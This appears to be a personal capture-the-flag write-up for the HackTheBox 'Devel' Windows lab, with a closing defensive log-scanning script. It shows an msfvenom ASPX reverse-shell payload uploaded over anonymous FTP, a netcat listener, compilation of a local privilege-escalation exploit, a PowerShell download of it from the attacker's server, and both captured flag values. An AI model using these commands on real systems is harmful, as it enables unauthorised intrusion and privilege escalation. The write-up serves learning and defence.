This is my attempt to solve HTB’s DEVEL

JOURNEY TO OSCP

[Box card] Devel | Windows | Difficulty: Easy | Points: 20 | Release: 15 Mar 2017 | IP: 10.10.10.5

 

 

NMAP:

 

 

Website:

 

[Screenshot] http://10.10.10.5 shows the default IIS7 (Internet Information Services) welcome page, the "Welcome" banner repeated in many languages.

 

Not much on the website: it is only the default IIS7 welcome page.

 

FTP:

 

Port 21 is open and “Anonymous FTP login is allowed”:

 

Looking closer by logging in:

 

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows NT.
ftp>

 

I’m able to see items inside:

 

 

I learned that, because the anonymous FTP root is also the directory IIS serves, I can upload a web shell or reverse shell and get access to the server.

 

Reverse Shell:

 

We can use msfvenom to create a custom payload for the exploit. Make sure you understand the various reverse shells available so you can choose the right one; for example, select windows/meterpreter/reverse_tcp only if you are using Metasploit. Also make sure you understand the difference between staged and stageless (unstaged) payloads. In our case we use the non-Meterpreter, stageless reverse shell payload windows/shell_reverse_tcp to generate the ASPX payload. With this, I have the option to catch the shell with a basic netcat listener; the staged version will not work with a netcat listener.

 

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=5555 -f aspx > devel.aspx

 

The listening host is the attacking machine (ip address | grep tun) and the port is the one we will listen on. This creates the backdoor payload file, devel.aspx. Upload this file, as described above, to the FTP root directory.

 

 

Now browse to http://10.10.10.5/devel.aspx with the netcat listener set up and ready.

 

And I have a low-privilege shell:

nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.5] 49161
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>

 

Privilege Escalation:

As soon as we visit the malicious URL 10.10.10.5/test.aspx the exploitation process starts. In the listener we can see that we have a shell running as iis apppool\web.

nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.5] 49162
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

c:\windows\system32\inetsrv>

 

 

The next goal is to escalate my privileges. Windows Exploit Suggester is a tool that compares a machine's patch level, taken from its systeminfo output, against a database of public exploits. For this, I saved the output of systeminfo to a text file.

 

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, (time cut off in screenshot)
System Boot Time:          21/4/2021, (time cut off in screenshot)
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:
Boot Device:
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.477 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.557 MB
Virtual Memory: In Use:    584 MB
Page File Location(s):
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::... (truncated in screenshot)
                                 [04]: dead:beef::... (truncated in screenshot)

 

Key information: Windows 7 | Host name: Devel | OS name: Windows 7 Enterprise | Version: 6.1.7600 | Hotfixes: N/A

 

Windows privilege escalation is my weakest area.

 

I went to Google and found this exploit:

 

 

The next step is to download and compile the exploit on the attack machine.

 

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
ls
40564.c  40564.exe  devel.aspx

 

I then needed to transfer the compiled exploit (40564.exe) from the attacker to the victim, using a simple Python HTTP server on the attack machine:

 

python -m SimpleHTTPServer 8080

 

wget and curl are not installed on the machine, but PowerShell is, so I used its WebClient to fetch the file:

 

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.63:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

 

I then ran whoami /all:

c:\windows\system32\inetsrv>whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID
================ =================================================================
iis apppool\web  S-1-5-82-2971860261-2701350812-2118117159-340795515-2183480550

GROUP INFORMATION
-----------------

Group Name                           Type              SID           Attributes
==================================== ================= ============= ==================================================
Mandatory Label\High Mandatory Level Label             S-1-16-12288
Everyone                             Well-known group  S-1-1-0       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias             S-1-5-32-545  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group  S-1-5-6       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group  S-1-2-1       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group  S-1-5-11      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group  S-1-5-15      Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias             S-1-5-32-568  Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group  S-1-2-0       Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type  S-1-5-82-0    Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

c:\windows\system32\inetsrv>

 

 

User flag:

 

c:\Users>cd babis
cd babis

c:\Users\babis>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis

17/03/2017    <DIR>          .
17/03/2017    <DIR>          ..
17/03/2017    <DIR>          Contacts
18/03/2017    <DIR>          Desktop
17/03/2017    <DIR>          Documents
17/03/2017    <DIR>          Downloads
17/03/2017    <DIR>          Favorites
17/03/2017    <DIR>          Links
17/03/2017    <DIR>          Music
17/03/2017    <DIR>          Pictures
17/03/2017    <DIR>          Saved Games
17/03/2017    <DIR>          Searches
17/03/2017    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  22.275.076.096 bytes free

c:\Users\babis>cd Desktop
cd Desktop

c:\Users\babis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis\Desktop

18/03/2017  02:14    <DIR>          .
18/03/2017  02:14    <DIR>          ..
18/03/2017  02:18                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  22.275.076.096 bytes free

c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8

 

Root flag:

 

c:\Users>cd Administrator
cd Administrator

c:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator

18/03/2017    <DIR>          .
18/03/2017    <DIR>          ..
18/03/2017    <DIR>          Contacts
14/01/2021    <DIR>          Desktop
18/03/2017    <DIR>          Documents
18/03/2017    <DIR>          Downloads
18/03/2017    <DIR>          Favorites
18/03/2017    <DIR>          Links
18/03/2017    <DIR>          Music
18/03/2017    <DIR>          Pictures
18/03/2017    <DIR>          Saved Games
18/03/2017    <DIR>          Searches
18/03/2017    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  22.275.076.096 bytes free

c:\Users\Administrator>cd Desktop
cd Desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator\Desktop

14/01/2021  12:42    <DIR>          .
14/01/2021  12:42    <DIR>          ..
18/03/2017  02:17                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  22.275.076.096 bytes free

c:\Users\Administrator\Desktop>type root.txt
type root.txt
e621a0b5041708797c4fc4728bc72b4b

 

That’s it

 

Lessons Learned:

FTP should not allow an open login such as anonymous.

 

Anyone can do what I just did: upload a web shell over anonymous FTP into the web root and exploit the system.
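As an added example (not part of the original write-up), the detection side of the two lessons above: a small Python scanner over IIS FTP W3C logs that flags an accepted anonymous login and any completed STOR of a web-executable file. The log lines are constructed for illustration; the field names follow the W3C extended format IIS FTP writes, and the IP addresses reuse the ones from this write-up.

```python
import os
from collections import namedtuple

# Extensions IIS will execute if they land in the web root (the FTP root on Devel).
WEB_EXECUTABLE = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".config", ".php"}

# Constructed sample log, not a real capture; columns follow the #Fields header.
SAMPLE_LOG = """\
#Fields: date time c-ip c-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2021-04-21 19:02:11 10.10.14.11 - 10.10.10.5 21 USER anonymous 331 0 0 a1b2 /
2021-04-21 19:02:12 10.10.14.11 anonymous 10.10.10.5 21 PASS *** 230 0 0 a1b2 /
2021-04-21 19:02:20 10.10.14.11 anonymous 10.10.10.5 21 LIST - 226 0 0 a1b2 /
2021-04-21 19:03:05 10.10.14.11 anonymous 10.10.10.5 21 STOR devel.aspx 226 0 0 a1b2 /devel.aspx
2021-04-21 19:10:40 10.10.14.12 babis 10.10.10.5 21 STOR notes.txt 226 0 0 c3d4 /notes.txt
2021-04-21 19:11:02 10.10.14.12 babis 10.10.10.5 21 STOR shell.asp 226 0 0 c3d4 /images/shell.asp
"""

Alert = namedtuple("Alert", "time client user reason path")

def parse_w3c(text: str) -> list:
    """Turn W3C extended log text into dicts keyed by the names in the #Fields line."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]            # the header defines the column order
        elif line.startswith("#") or not line.strip() or fields is None:
            continue                              # other directives, blanks, pre-header lines
        else:
            rows.append(dict(zip(fields, line.split())))
    return rows

def find_upload_alerts(text: str) -> list:
    """Flag accepted anonymous logins and completed uploads of server-executable files."""
    alerts = []
    for r in parse_w3c(text):
        method, status, user = r.get("cs-method"), r.get("sc-status"), r.get("c-username", "-")
        path = r.get("x-fullpath") or r.get("cs-uri-stem", "")
        is_anon = user.lower() == "anonymous"
        if method == "PASS" and status == "230" and is_anon:     # 230 = login succeeded
            alerts.append(Alert(r["time"], r["c-ip"], user, "anonymous login accepted", path))
        if method == "STOR" and status == "226":                 # 226 = transfer complete
            if os.path.splitext(path)[1].lower() in WEB_EXECUTABLE:
                who = "anonymous" if is_anon else "authenticated"
                alerts.append(Alert(r["time"], r["c-ip"], user, f"{who} upload of web-executable file", path))
    return alerts

if __name__ == "__main__":
    for a in find_upload_alerts(SAMPLE_LOG):
        print(f"{a.time} {a.client} {a.user}: {a.reason} ({a.path})")
```

On the sample log this reports the anonymous login, the anonymous devel.aspx upload and the authenticated shell.asp upload, while the harmless notes.txt upload is ignored.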

 

 

I recommend either patching Windows 7 Enterprise or upgrading to a modern version of Windows, since support for Windows 7 has now been discontinued.

 

Overall this box was challenging. I could have done it with Metasploit, but I'm trying to get better without using it.